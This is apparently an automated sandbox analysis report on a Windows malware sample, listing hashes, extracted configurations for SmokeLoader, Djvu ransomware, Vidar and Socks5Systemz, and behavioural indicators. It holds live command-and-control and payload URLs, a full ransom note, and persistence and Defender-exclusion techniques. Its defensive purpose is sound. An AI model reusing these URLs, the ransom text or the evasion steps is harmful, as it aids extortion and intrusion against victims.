Resubmissions
22-08-2024 15:33 240822-sy6bqsvbng 7
10-03-2024 16:21 240310-ttpc4aga89 10
10-03-2024 12:34 240310-prvpwacf93 10
Analysis
-
max time kernel
331s -
max time network
705s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system -
submitted
10-03-2024 16:21
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20240226-en
General
-
Target
file.exe
-
Size
2.4MB
-
MD5
b11c3fad2e48022f58635df7368d6441
-
SHA1
63883fee892ac1e0d44f568913931c0d59b343d1
-
SHA256
2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80
-
SHA512
6c68523b259c307e1c4ff4c6809fb20e5d9d9998a32d03ca06eaf29ec8f27bcaca2cafd9b57420b307160b3ebfeac16d234b99f6119f8f3038f4b5bf4b169023
-
SSDEEP
49152:jCqqfqaaK++EFUw2PsQMIZnLzn8FGaqxMBeVBBzKl:jONGXqGY1y
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
djvu
http://sajdfue.com/test1/get.php
-
extension
.wisz
-
offline_id
4p0Nzrg1q0ND5of5Gtp2UBjthSXuE8VxnMrd4vt1
-
payload_url
http://sdfjhuz.com/dl/build2.exe
http://sajdfue.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/a832401adcd58098c699f768ffea4f1720240305114308/7e601a Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0853PsawqS
Extracted
vidar
8.1
e2da5861d01d391b927839bbec00e666
https://steamcommunity.com/profiles/76561199649267298
https://t.me/uprizin
-
profile_id_v2
e2da5861d01d391b927839bbec00e666
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 OPR/96.0.0.0
Extracted
socks5systemz
http://bwxobsm.com/search/?q=67e28dd86a5ef62a130aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a771ea771795af8e05c644db22f31df92d8b38e316a667d307eca743ec4c2b07b52966923a678ef719c0eb95
http://bwxobsm.com/search/?q=67e28dd86a5ef62a130aa5197c27d78406abdd88be4b12eab517aa5c96bd86ef928749825a8bbc896c58e713bc90c91936b5281fc235a925ed3e04d6bd974a95129070b617e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff810c0ef9d923bc96f
http://bmoarca.com/search/?q=67e28dd86a5ef62a130aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a771ea771795af8e05c644db22f31df92d8b38e316a667d307eca743ec4c2b07b52966923a678ef719c0eb95
Signatures
-
DcRat 15 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 316 schtasks.exe 624 schtasks.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\SystemCertificates\My AddInProcess32.exe 2856 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" BHyvkIgo1eAG39KMFmpK1JKB.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oiwoojO7aCnS76ky0A3P8DMx.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lxA3XocXtP9XlNgjC5O7KuK.bat AddInProcess32.exe 1264 schtasks.exe 2680 schtasks.exe 604 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2sJVfkT27wtG2C4trNOQAZnM.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JMztMoTunBObvxw75ySU1GJv.bat AddInProcess32.exe 1540 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mZZHXrrVKMKMXnLVwLQEKizp.bat AddInProcess32.exe 2216 schtasks.exe -
Detect Socks5Systemz Payload 2 IoCs
resource yara_rule behavioral1/memory/448-588-0x0000000002660000-0x0000000002704000-memory.dmp family_socks5systemz behavioral1/memory/448-704-0x0000000002660000-0x0000000002704000-memory.dmp family_socks5systemz -
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral1/memory/1880-574-0x0000000000230000-0x0000000000262000-memory.dmp family_vidar_v7 behavioral1/memory/1032-585-0x0000000000400000-0x0000000000645000-memory.dmp family_vidar_v7 behavioral1/memory/1032-701-0x0000000000400000-0x0000000000645000-memory.dmp family_vidar_v7 behavioral1/memory/1032-751-0x0000000000400000-0x0000000000645000-memory.dmp family_vidar_v7 -
Detected Djvu ransomware 6 IoCs
resource yara_rule behavioral1/memory/2112-457-0x0000000001E50000-0x0000000001F6B000-memory.dmp family_djvu behavioral1/memory/2416-462-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2416-491-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1952-505-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1880-573-0x0000000002080000-0x0000000002180000-memory.dmp family_djvu behavioral1/memory/1952-587-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 10 IoCs
resource yara_rule behavioral1/memory/1972-122-0x0000000002CB0000-0x000000000359B000-memory.dmp family_glupteba behavioral1/memory/1972-123-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1972-182-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1972-186-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/832-211-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/832-284-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/832-297-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2064-308-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2064-360-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2064-439-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BHyvkIgo1eAG39KMFmpK1JKB.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 2596 bcdedit.exe 1396 bcdedit.exe 1948 bcdedit.exe 3020 bcdedit.exe 2332 bcdedit.exe 2128 bcdedit.exe 2280 bcdedit.exe 2540 bcdedit.exe 2120 bcdedit.exe 2408 bcdedit.exe 888 bcdedit.exe 2932 bcdedit.exe 2652 bcdedit.exe 2132 bcdedit.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe File created C:\Windows\system32\drivers\etc\hosts PHZUeKsym6c4ao1N4lAzfMjT.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2924 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Stops running service(s) 3 TTPs
-
Drops startup file 11 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JMztMoTunBObvxw75ySU1GJv.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mZZHXrrVKMKMXnLVwLQEKizp.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5865l1C9DxinGCBdGI6B1MoP.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFwUaZAUUG4Bz1JYIKNt5db6.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oiwoojO7aCnS76ky0A3P8DMx.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lxA3XocXtP9XlNgjC5O7KuK.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2sJVfkT27wtG2C4trNOQAZnM.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QtGQLyuChGgsFZ31jtks8XvM.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rp0Gte16gcoJAEqdk4xsl0HN.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4nvAvIM2vYQKd9Cp7nQ9lAyZ.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h0iow1IYrorSkOj3adeAxdGj.bat AddInProcess32.exe -
Executes dropped EXE 42 IoCs
pid Process 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe 2304 babyclock.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 992 syncUpd.exe 448 babyclock.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 2656 BroomSetup.exe 2064 csrss.exe 1956 patch.exe 1248 injector.exe 2012 dsefix.exe 2112 FE0F.exe 2416 FE0F.exe 604 FE0F.exe 1952 FE0F.exe 1756 windefender.exe 2704 windefender.exe 1880 build2.exe 2640 build3.exe 1032 build2.exe 304 build3.exe 2236 PHZUeKsym6c4ao1N4lAzfMjT.exe 2640 mstsca.exe 2328 mstsca.exe 3064 updater.exe 2252 8D34.exe 884 mstsca.exe 3060 mstsca.exe 472 2437.exe 1600 mstsca.exe 2752 mstsca.exe 2480 vgtejgi 2276 mstsca.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1624 syncUpd.exe 336 RuIUvkS8wVfymaAK7lF9BY8u.exe 2224 wz8VvURJ6HobiJci3zt7FzSf.exe 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1000 FusMm6h3ZIYvS3H6ML4oKi29.exe -
Loads dropped DLL 64 IoCs
pid Process 1260 AddInProcess32.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1260 AddInProcess32.exe 1260 AddInProcess32.exe 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1260 AddInProcess32.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 860 Process not Found 1956 patch.exe 1956 patch.exe 1956 patch.exe 1956 patch.exe 1956 patch.exe 2064 csrss.exe 1956 patch.exe 1956 patch.exe 1956 patch.exe 2064 csrss.exe 2112 FE0F.exe 2416 FE0F.exe 2416 FE0F.exe 604 FE0F.exe 992 syncUpd.exe 992 syncUpd.exe 1952 FE0F.exe 1952 FE0F.exe 1952 FE0F.exe 1952 FE0F.exe 1896 WerFault.exe 1896 WerFault.exe 1896 WerFault.exe 1896 WerFault.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 480 Process not Found 480 Process not Found 2408 WerFault.exe 2408 WerFault.exe 2408 WerFault.exe 1208 Process not Found 1260 AddInProcess32.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 2224 wz8VvURJ6HobiJci3zt7FzSf.exe 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1224 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0007000000016c4a-271.dat upx behavioral1/files/0x0007000000016c4a-279.dat upx behavioral1/memory/2656-283-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/2656-358-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/1756-508-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2704-509-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/1756-511-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2704-666-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/files/0x0007000000016c4a-1138.dat upx behavioral1/files/0x000600000001a4d5-1249.dat upx behavioral1/files/0x000600000001a4d9-1339.dat upx behavioral1/files/0x000500000001a4e0-1345.dat upx -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 141.98.234.31 Destination IP 141.98.234.31 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BHyvkIgo1eAG39KMFmpK1JKB.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f55404de-f96d-40e3-8f6a-c259dbe6d608\\FE0F.exe\" --AutoStart" FE0F.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 173 pastebin.com 174 pastebin.com 2663 pastebin.com 2665 pastebin.com 3 pastebin.com 4 pastebin.com 88 bitbucket.org 89 bitbucket.org -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 api.2ip.ua 57 api.2ip.ua 58 api.2ip.ua -
Manipulates WinMon driver. 1 IoCs
Rootkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe PHZUeKsym6c4ao1N4lAzfMjT.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 2528 set thread context of 1260 2528 file.exe 28 PID 2112 set thread context of 2416 2112 FE0F.exe 100 PID 604 set thread context of 1952 604 FE0F.exe 107 PID 1880 set thread context of 1032 1880 build2.exe 116 PID 2640 set thread context of 304 2640 build3.exe 118 PID 2640 set thread context of 2328 2640 mstsca.exe 126 PID 3064 set thread context of 920 3064 updater.exe 180 PID 3064 set thread context of 2460 3064 updater.exe 185 PID 884 set thread context of 3060 884 mstsca.exe 193 PID 1600 set thread context of 2752 1600 mstsca.exe 197 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN BHyvkIgo1eAG39KMFmpK1JKB.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe BHyvkIgo1eAG39KMFmpK1JKB.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\Logs\CBS\CbsPersist_20240310162609.cab makecab.exe File opened for modification C:\Windows\rss BHyvkIgo1eAG39KMFmpK1JKB.exe -
Launches sc.exe 34 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 2448 sc.exe 1984 sc.exe 2044 sc.exe 2900 sc.exe 560 sc.exe 2144 sc.exe 1804 sc.exe 1860 sc.exe 1760 sc.exe 2636 sc.exe 1968 sc.exe 1872 sc.exe 1132 sc.exe 2720 sc.exe 1864 sc.exe 3012 sc.exe 2936 sc.exe 1864 sc.exe 2980 sc.exe 2208 sc.exe 2032 sc.exe 904 sc.exe 1200 sc.exe 1152 sc.exe 2084 sc.exe 1208 sc.exe 1892 sc.exe 2532 sc.exe 1928 sc.exe 2276 sc.exe 2400 sc.exe 1784 sc.exe 472 sc.exe 2528 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1896 1032 WerFault.exe 116 2408 2252 WerFault.exe 187 -
NSIS installer 1 IoCs
resource yara_rule behavioral1/files/0x0006000000016eb2-162.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgtejgi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RuIUvkS8wVfymaAK7lF9BY8u.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RuIUvkS8wVfymaAK7lF9BY8u.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgtejgi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Hz5DKFVHt5wmDrYd00peGwos.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Hz5DKFVHt5wmDrYd00peGwos.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgtejgi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RuIUvkS8wVfymaAK7lF9BY8u.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Hz5DKFVHt5wmDrYd00peGwos.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 624 schtasks.exe 1264 schtasks.exe 2216 schtasks.exe 2680 schtasks.exe 604 schtasks.exe 2856 schtasks.exe 316 schtasks.exe 1540 schtasks.exe -
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 220 Go-http-client/1.1 HTTP User-Agent header 222 Go-http-client/1.1 HTTP User-Agent header 227 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius 
Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. 
